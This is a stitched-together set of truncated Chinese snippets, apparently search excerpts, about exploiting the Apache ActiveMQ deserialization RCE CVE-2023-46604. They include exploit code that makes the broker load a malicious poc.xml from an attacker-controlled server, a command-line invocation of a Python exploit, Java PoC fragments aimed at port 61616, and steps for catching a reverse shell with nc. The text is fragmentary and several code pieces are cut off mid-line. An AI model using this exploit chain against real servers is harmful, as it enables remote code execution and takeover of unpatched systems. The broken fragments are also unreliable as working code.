通过本地新建org.apache.activemq.transport.tcp.TcpTransport 类重写对应逻辑,运行时优先触发本地的 TcpTransport 类 /*** A one way asynchronous send*/@Overridepublicvoidoneway(Objectcommand)throwsIOException{checkStarted();Throwableobj=newClassPathXmlApplicationContext("http://192.168.184.1:9090/poc.x...
# 发送pocpython3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml 本地环境测试效果 poc.xml : 你可以通过修改poc.xml中的rce命令来做不同的验证 <?xml version="1.0"encoding="UTF-8"?><beansxmlns="http://www.springframework.org/schema/beans"xmlns:xsi="...
接着进入org.apache.activemq.openwire.v12.BaseDataStreamMarshaller#createThrowable 这里可以调用任意类的一个string类型的有参公有构造函数,很容易想到ClassPathXmlApplicationContext。 接着写一下poc,我们需要发送ExceptionResponse给服务端,直接用X1r0z的思路,patchorg.apache.activemq.transport.tcp.TcpTransport#oneway...
connection.start();Throwableobj=newClassPathXmlApplicationContext("http://127.0.0.1:7777/poc.xml");ExceptionResponseexceptionResponse=newExceptionResponse(obj);// ConnectionError connectionError = new ConnectionError();// connectionError.setException(obj);// MessageAck messageAck = new MessageAck();/...
poc:github.com/trganda/Acti 1.将rce.xml,上传至vps,利用python开启http服务 ;nc开启监听 2.运行Main.java 注:直接运行会发现报错:java: 警告: 源发行版 11 需要目标发行版 11 PS:这种一般是你idea的 配置文件iml 与 项目中 配置的jdk版本是不一致导致的 3.成功反弹shell 漏洞分析 漏洞分析:作者分析了漏洞...
同时,长亭安全研究员发现该漏洞除了利用Java Flight Recorder来实现RCE,攻击者还可能会通过调用org.apache.logging.log4j2 MBean的setConfigText方法来实现对ActiveMQ的日志配置进行热重载(动态更新)以实现指定日志输出的路径和级别。这允许攻击者将特定的日志信息(例如Webshell代码)输出到特定的文件位置,使得该漏洞的利用...
import java.io.*; import java.net.Socket; public class ActiveMQRCE { public static void main(String[] args) throws Exception { String ip = "127.0.0.1"; // 目标IP地址 int port = 61616; // ActiveMQ的OpenWire端口 String pocxml = "http://your-server/poc.xml"; // 恶意XML文件的URL ...
Apache ActiveMQ (版本 < 5.18.3) RCE 分析 环境搭建 java 1.8 331 activemq 5.15.15ActiveMQ (apache.org) idea远程调试 分析 跟在大哥,首先看历史提交吧 https://github.com/apache/activemq/commit/958330df26cf3d5cdb63905dc2c6882e98781d8f https://github.com/apache/activemq/blob/1d0a6d647e4683341...
RCE在能调用Constructor(String)后,选择了这个activemq自带的gadget类:org.springframework.context.support.ClassPathXmlApplicationContextFinal POC用http服务器serve如下xml<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="...
## ActiveMqRCE 有回显 ``` https://github.com/Hutt0n0/ActiveMqRCE ``` ## 11.16号新增有回显的命令执行exp ``` <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:spring=...